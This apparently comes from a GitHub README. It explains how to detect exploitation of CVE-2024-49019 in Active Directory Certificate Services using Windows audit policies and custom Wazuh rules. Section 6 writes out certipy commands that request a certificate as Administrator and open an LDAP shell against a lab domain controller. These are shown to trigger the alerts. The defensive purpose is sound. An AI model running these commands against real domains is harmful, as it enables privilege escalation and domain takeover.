# Detection Guide for CVE-2024-49019

## Overview
This guide provides step-by-step instructions on configuring Windows Server 2022 and Wazuh to detect exploitation attempts of **CVE-2024-49019**. By enabling the necessary audit policies and configuring log forwarding, security teams can effectively monitor suspicious activities related to Active Directory Certificate Services (AD CS) attacks.

---

## 1. Configure Windows Server 2022 Audit Policies
To capture relevant security events, enable the following audit policies:

### **Enable Audit Policies via Group Policy**
1. Open **Group Policy Management**
2. Navigate to:
   ```
   Forest pchau.domain.local
   └── Domains
       └── pchau.domain.local
           └── Group Policy Objects
   ```
3. Right-click **"Default Domain Controllers Policy"** > Click **Edit**
4. Navigate to:
   ```
   Computer Configuration
   ├── Policies
   ├── Windows Settings
   ├── Security Settings
   ├── Advanced Audit Policy Configuration
   └── Audit Policies
   ```
5. Enable the following policies:
   - **Audit Kerberos Authentication Service**
   - **Audit Kerberos Service Ticket Operations**
   - **Audit RPC Events**
   - **Audit Directory Service Access**
   - **Audit Directory Service Changes**
   - **Audit Directory Service Replication**
   - **Audit Application Generated**
   - **Audit Certification Services**
   - **Audit Security System Extension**

### **Enable LDAP Logging via Registry**
To monitor LDAP connection attempts, modify the Windows Registry:
1. Open **Registry Editor** (`regedit`)
2. Navigate to:
   ```
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics
   ```
3. Modify the following values:
   - **15 Field Engineering** → Set to `5`
   - **16 LDAP Interface Event** → Set to `5`

These settings will generate logs when attackers attempt unauthorized LDAP queries.

---

## 2. Ensure Windows Server 2022 Logs Are Sent to Wazuh
### **Start Wazuh Agent on Windows Server 2022**
1. Open **Server Manager**
2. Navigate to **Local Server** > **All Services**
3. Locate **Wazuh** service
4. Right-click and select **Start**
5. Ensure that all the services are running. Incase the exploitation not working probably


![startwazuhservice](https://github.com/user-attachments/assets/872d067c-1edb-4961-8e8c-2f1da49a064e)


> ⚠️ Without this step, Windows Server 2022 will not forward logs to Wazuh for detection.

---

## 3. Configure Wazuh to Detect Exploitation Attempts
### **Access Wazuh Dashboard**
1. Open **Firefox**
2. Enter the Wazuh server's IP in the browser:
   ```
   http://10.0.2.159
   ```
3. Log in using saved credentials
4. Verify that the Windows Server agent is active:
   - Navigate to **Agents Summary**
   - Ensure it displays **Active (1)**

![makesurewazuhagentisactive](https://github.com/user-attachments/assets/a26dff94-3c67-4d96-bb7e-9a241ff7d213)


### **Modify Wazuh Rules to Detect Active Directory Attacks**
Wazuh does not natively capture **Directory Service events** (Event ID **1138** and **1139**). To enable this:

#### **Modify `0575-win-base_rules.xml`**
1. Open a terminal in Wazuh:
   ```bash
   sudo -i
   ```
   > Enter the **admin password** when prompted.
2. Edit the rules file:
   ```bash
   nano /var/ossec/ruleset/rules/0575-win-base_rules.xml
   ```
3. Add the following rules:
   ```xml
   <rule id="60020" level="0">
       <if_sid>60000</if_sid>
       <field name="win.system.channel">^Directory Service$</field>
       <options>no_full_log</options>
       <description>Group of Windows rules for Directory Channel</description>
   </rule>
   
   <rule id="60021" level="0">
       <if_sid>60020</if_sid>
       <field name="win.system.providerName">^Microsoft-Windows-ActiveDirectory_DomainService$</field>
       <options>no_full_log</options>
       <description>Group of rules for Windows eventlog from Directory Service.</description>
   </rule>
   ```

---

## 4. Configure Log Forwarding to Wazuh
To ensure Windows Server 2022 sends logs to Wazuh:

### **Modify `ossec.conf` on Windows Server**
1. Navigate to:
   ```
   C:\Program Files (x86)\ossec-agent\ossec.conf
   ```
2. Open the file in Notepad
3. Add the following entry:
   ```xml
   <localfile>
       <location>Directory Service</location>
       <log_format>eventchannel</log_format>
   </localfile>
   ```
4. Save and restart the Wazuh agent.

### **Modify Log Configuration in Wazuh GUI**
Alternatively, configure logs via Wazuh’s dashboard:
1. Navigate to **Menu > Groups**
2. Select **Edit Group Configuration** (default group)
3. Add the same `<localfile>` entry as above.

---

## 5. Configure Custom Wazuh Rules for CVE-2024-49019
To detect exploitation attempts, create custom rules:

### **Modify `local_rules.xml` in Wazuh**
1. Open Wazuh dashboard
2. Navigate to **Menu > Rules > Manage Rules Files**
3. Search for **local_rules.xml** and click **Edit**
4. Add the following rules located in [local_rules.xml](https://github.com/rayngnpc/CVE-2024-49019/blob/main/local_rules.xml)
   
5. Event IDs to Capture

As you can see, there are many rules, but we need to focus on the following event IDs:

| Event ID | Rule ID |
|----------|--------|
| 5136     | 110068 |
| 1138,1139 | 110069 |
| 4886     | 110065 |
| 4887     | 110066 |
| 4898     | 110067 |
| 1644     | 110064 |
| 4662     | 110001 |

These events need to be captured during the exploitation.

6. Save the file and restart Wazuh:
   ```bash
   systemctl restart wazuh-manager
   ```
## 6. Threat Hunting in Wazuh
Navigate to **Threat Hunting > Events** to monitor incoming logs. This is where relevant events will appear when an attacker attempts exploitation.

### **Exploitation Detection**
#### **ESC1 Method**
```bash
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
```
_Result in Events:_

![capturecertipy-findnum1](https://github.com/user-attachments/assets/aad10806-f1ac-4eee-a9ba-6ae0b13818f7)

![capturecertipy-findnum2](https://github.com/user-attachments/assets/53535e7e-0460-4d3e-8d7d-5eb53043e9f2)

```bash
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u 'testuser@pchau.domain.local' -p '$Vulnerable139' -template "WebServer" -upn "Administrator@pchau.domain.local" --application-policies 'Client Authentication'
```
_Result in Events:_

![capturecertipy-findnum3](https://github.com/user-attachments/assets/0a52b41a-edea-405d-97af-1a68136d3e9b)


```bash
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
```
When the attacker establishes an LDAP shell, it will trigger an alert similar to:

![capturecertipy-findnum4](https://github.com/user-attachments/assets/c69a56dc-1cc0-4d84-9b18-4b059bba2479)


#### **ESC3 Method**
Both of the following commands will generate alerts for Event IDs **4886, 4887, 4898, and 4662** which are similarities to the above ESC1:

```bash
certipy req -u testuser@pchau.domain.local -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
```

```bash
certipy req -u testuser@pchau.domain.local -p '$Vulnerable139' -ca pchau-SERVER2022-CA -template WebServer -dc-ip 10.0.2.121 -upn 'Administrator@pchau.domain.local'
```

After running:
```bash
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
```
The result will show up in the events:

![capturecertipy-findnum5](https://github.com/user-attachments/assets/a4d9ab91-7fd7-4962-96d6-21d22976af71)

---




---

## Conclusion
By following this guide, you can:
---
✅ Detect unauthorized LDAP queries and privilege escalation attempts
---
✅ Monitor Windows Event Logs for suspicious activities
---
✅ Configure Wazuh to alert security teams when exploitation attempts occur
---
For additional configurations, refer to the official [Wazuh documentation](https://documentation.wazuh.com/current/index.html) or [Active Directory security hardening guides](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory).

---

